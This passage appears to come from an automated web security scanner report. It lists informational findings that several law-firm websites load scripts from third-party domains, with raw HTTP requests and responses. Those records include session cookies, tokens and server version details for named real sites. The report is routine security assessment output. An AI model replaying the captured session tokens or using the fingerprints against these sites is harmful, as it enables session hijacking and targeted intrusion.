Cookie: CFID=26523218; CFTOKEN=a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31; CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D2%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A06%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D3%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23;expires=Sat, 04-May-2041 18:12:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
25.49. http://www.orangecountyala.org/clubportal/ocala/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/ocala/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /clubportal/ocala/ HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/orange-county-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26523221;expires=Sat, 04-May-2041 18:11:52 GMT;path=/
Set-Cookie: CFTOKEN=8c9fadb1fcd2b998-E5685AEF-A651-1E8F-1BA89A8BCD46CACC;expires=Sat, 04-May-2041 18:11:52 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523221%26CFTOKEN%23%3D8c9fadb1fcd2b998%2DE5685AEF%2DA651%2D1E8F%2D1BA89A8BCD46CACC%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A52%27%7D%23hitcount%3D2%23cftoken%3D8c9fadb1fcd2b998%2DE5685AEF%2DA651%2D1E8F%2D1BA89A8BCD46CACC%23cfid%3D26523221%23;expires=Sat, 04-May-2041 18:11:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head>
   <title>
   Orange County Chapter Association of Legal Administrators -
   </title>
   
   
           <meta name="keywords" content="Orange County Chapter Association of Legal Administr
...[SNIP]...
</table>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
25.50. http://www.perkinscoie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Perkins+Coie&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:01 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1089; path=/
Set-Cookie: PortletId=1901; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bhdcqa45wofgyj55yavek255; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 62469
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/
Content-Length: 62469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Co
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/7181.js"></script>
...[SNIP]...
25.51. http://www.perkinscoie.com/AdvancedSearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /AdvancedSearch.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /AdvancedSearch.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:57:30 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1089; path=/
Set-Cookie: PortletId=1901; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Advanced Sea
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.52. http://www.perkinscoie.com/events/eventslist.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /events/eventslist.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /events/eventslist.aspx?Upcoming=true HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/mquehrn/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:56 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1173; path=/
Set-Cookie: PortletId=1873101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 69542
Content-Length: 69542


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Co
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.53. http://www.perkinscoie.com/firm/firm.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /firm/firm.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /firm/firm.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:56:53 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1175; path=/
Set-Cookie: PortletId=1875101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Coie
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.54. http://www.perkinscoie.com/mquehrn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /mquehrn/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mquehrn/ HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals_results.aspx?LastName=Q
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:33 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 60797
Content-Length: 60797


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.55. http://www.perkinscoie.com/news/news_detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /news/news_detail.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/news_detail.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:56:54 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1174; path=/
Set-Cookie: PortletId=1874101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26936


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.56. http://www.perkinscoie.com/professionals/professionals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /professionals/professionals.aspx HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1089; PortletId=1901; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305216548.1; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:07 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 122863
Content-Length: 122863


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.57. http://www.perkinscoie.com/professionals/professionals_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals_results.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /professionals/professionals_results.aspx?LastName=Q HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals.aspx
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:13 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 38843
Content-Length: 38843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       Perkins
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.58. http://www.pomerantzlaw.com/cases.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.59. http://www.pomerantzlaw.com/contact-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /contact-us.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
